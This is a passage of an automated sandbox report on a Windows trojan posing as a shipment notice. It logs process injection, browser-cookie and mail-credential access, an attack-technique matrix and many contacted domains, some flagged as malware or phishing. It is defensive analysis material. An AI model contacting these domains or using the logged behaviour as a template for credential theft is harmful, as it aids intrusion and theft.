          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information

          Source: Yara match | File source: 2.2.Shipment_notification.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.Shipment_notification.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000002.00000002.377445989.0000000001510000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.377228453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.580922850.0000000003170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.578168386.0000000002E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.577613473.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\SysWOW64\control.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
          Source: C:\Windows\SysWOW64\control.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
          Source: C:\Windows\SysWOW64\control.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
          Source: C:\Windows\SysWOW64\control.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
          Source: C:\Windows\SysWOW64\control.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: C:\Windows\SysWOW64\control.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
          Source: C:\Windows\SysWOW64\control.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State

          Remote Access Functionality

          Source: Yara match | File source: 2.2.Shipment_notification.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.Shipment_notification.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000002.00000002.377445989.0000000001510000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.377228453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.580922850.0000000003170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.578168386.0000000002E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.577613473.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | 1 Shared Modules | Path Interception | 612 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 21 Security Software Discovery | Remote Services | 1 Email Collection | Exfiltration Over Other Network Medium | 1 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 1 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | Exfiltration Over Bluetooth | 3 Ingress Tool Transfer | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | 31 Virtualization/Sandbox Evasion | Security Account Manager | 31 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | Automated Exfiltration | 4 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 612 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 14 Application Layer Protocol | SIM Card Swap | | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | 3 Obfuscated Files or Information | Cached Domain Credentials | 13 System Information Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | 3 Software Packing | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 1 File Deletion | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
          Behavior Graph ID: 830738 | Sample: Shipment_notification.exe | Startdate: 20/03/2023 | Architecture: WINDOWS | Score: 100
          Signatures: Snort IDS alert for network traffic; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 3 other signatures
          DNS/IP: www.amirah.cfd
          Shipment_notification.exe (started)
            Dropped: C:\Users\...\Shipment_notification.exe.log, ASCII
            Signature: Injects a PE file into a foreign processes
            Shipment_notification.exe (started)
              Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
              explorer.exe (injected)
                DNS/IP: www.locationsbormes.com 45.114.105.2, 49707, 49708, 80 XIAOZHIYUN1-AS-APICIDCNETWORKUS China; carcosainvest.com 206.54.190.30, 49699, 49700, 80 WZCOM-US United States; 9 other IPs or domains
                Signatures: System process connects to network (likely due to code injection or exploit); Performs DNS queries to domains with low reputation
                control.exe (started)
                  Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Deletes itself after installation; 2 other signatures
            Shipment_notification.exe (started)

          Source | Detection | Scanner | Label | Link
          Shipment_notification.exe | 39% | ReversingLabs | Win32.Trojan.Generic |
          Shipment_notification.exe | 43% | Virustotal | | Browse
          Shipment_notification.exe | 100% | Joe Sandbox ML | |
          No Antivirus matches
          Source | Detection | Scanner | Label | Link | Download
          2.2.Shipment_notification.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File
          No Antivirus matches
                                                • URL Reputation: safe
                                                unknown
                                                http://fontfabrik.comShipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://www.notebook-rucksack.com/rs5b/explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.rubyidentity.space/rs5b/explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.founder.com.cn/cn/bShipment_notification.exe, 00000000.00000003.315947840.000000000557F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.galapagosdesign.com/DPleaseShipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://www.isabellagambitta.comexplorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.fonts.comShipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://www.sandoll.co.krShipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.locationsbormes.comexplorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.searchvity.com/?dn=control.exe, 00000004.00000002.582622308.000000000551A000.00000004.10000000.00040000.00000000.sdmptrue
                                                  • URL Reputation: malware
                                                  unknown
                                                  http://www.rubyidentity.spaceexplorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.urwpp.deDPleaseShipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.zhongyicts.com.cnShipment_notification.exe, 00000000.00000003.316210305.0000000005579000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.kaj8tfjcmkn7.xyz/rs5b/Qexplorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.carterandcone.como.Shipment_notification.exe, 00000000.00000003.316267483.000000000557E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.sakkal.comShipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.zzxiaoyuan.comexplorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.carcosainvest.comexplorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.notebook-rucksack.com/rs5b/%explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.sajatypeworks.com.YShipment_notification.exe, 00000000.00000003.313400358.00000000055AD000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000003.313431498.00000000055AD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000003.00000000.339413260.0000000000921000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.577680371.000000000091F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    http://www.apache.org/licenses/LICENSE-2.0Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://www.fontbureau.comShipment_notification.exe, 00000000.00000002.336768528.0000000000C67000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://www.starauctioneerspro.com/rs5b/explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icocontrol.exe, 00000004.00000002.578430894.0000000002FA5000.00000004.00000020.00020000.00000000.sdmp, 10W12dX.4.drfalse
                                                          high
                                                          http://www.kaj8tfjcmkn7.xyzexplorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.zhongyicts.com.cnvShipment_notification.exe, 00000000.00000003.316210305.0000000005579000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.zhongyicts.com.cnxShipment_notification.exe, 00000000.00000003.316210305.0000000005579000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.founder.com.cn/cni9Shipment_notification.exe, 00000000.00000003.315344428.0000000005576000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000003.315357516.000000000557D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.kaj8tfjcmkn7.xyz/rs5b/explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.sajatypeworks.comzShipment_notification.exe, 00000000.00000003.313400358.00000000055AD000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000003.313431498.00000000055AD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.tcatelier.comexplorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.emagrecarapido.store/rs5b/explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=10W12dX.4.drfalse
                                                            high
                                                            http://www.zhongyicts.com.cnoShipment_notification.exe, 00000000.00000003.316210305.0000000005579000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.piergitarshoes.comexplorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchcontrol.exe, 00000004.00000002.578430894.0000000002FA5000.00000004.00000020.00020000.00000000.sdmp, 10W12dX.4.drfalse
                                                              high
                                                              http://www.fontbureau.comzanaShipment_notification.exe, 00000000.00000002.336768528.0000000000C67000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=control.exe, 00000004.00000002.578430894.0000000002FA5000.00000004.00000020.00020000.00000000.sdmp, 10W12dX.4.drfalse
                                                                high
                                                                http://www.carterandcone.comnShipment_notification.exe, 00000000.00000003.316267483.000000000557E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://www.carterandcone.comlShipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://www.tcatelier.com/rs5b/explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.ywtxsm.comexplorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://ac.ecosia.org/autocomplete?q=10W12dX.4.drfalse
                                                                  high
                                                                  https://search.yahoo.com?fr=crmas_sfpcontrol.exe, 00000004.00000002.578430894.0000000002FA5000.00000004.00000020.00020000.00000000.sdmp, 10W12dX.4.drfalse
                                                                    high
                                                                    http://www.fontbureau.com/designers/cabarga.htmlNShipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://www.isabellagambitta.com/rs5b/explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: phishing
                                                                      unknown
                                                                      http://www.53876.worldexplorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: malware
                                                                      unknown
                                                                      http://www.founder.com.cn/cnShipment_notification.exe, 00000000.00000003.315344428.0000000005576000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000003.316084822.0000000005576000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000003.316210305.0000000005579000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000003.315510968.0000000005576000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000003.316267483.000000000557E000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000003.315947840.000000000557F000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000003.315357516.000000000557D000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://www.fontbureau.com/designers/frere-jones.htmlShipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000003.320065711.00000000055AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://www.fontbureau.com/designers/cabarga.htmlPShipment_notification.exe, 00000000.00000003.320681722.0000000005578000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://www.carterandcone.comxShipment_notification.exe, 00000000.00000003.316267483.000000000557E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          http://www.searchvity.com/control.exe, 00000004.00000002.582622308.000000000551A000.00000004.10000000.00040000.00000000.sdmptrue
                                                                          • URL Reputation: malware
                                                                          unknown
                                                                          http://www.jiyu-kobo.co.jp/Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          http://www.zhongyicts.com.cno.Shipment_notification.exe, 00000000.00000003.316210305.0000000005579000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          http://www.fontbureau.com/designers8Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://www.53876.world/rs5b/explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: malware
                                                                            unknown
                                                                            http://www.peramid.xyzexplorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: malware
                                                                            unknown
                                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=10W12dX.4.drfalse
                                                                              high
Joe Sandbox Version: 37.0.0 Beryl
Analysis ID: 830738
Start date and time: 2023-03-20 16:47:46 +01:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 12m 7s
Hypervisor based Inspection enabled: false
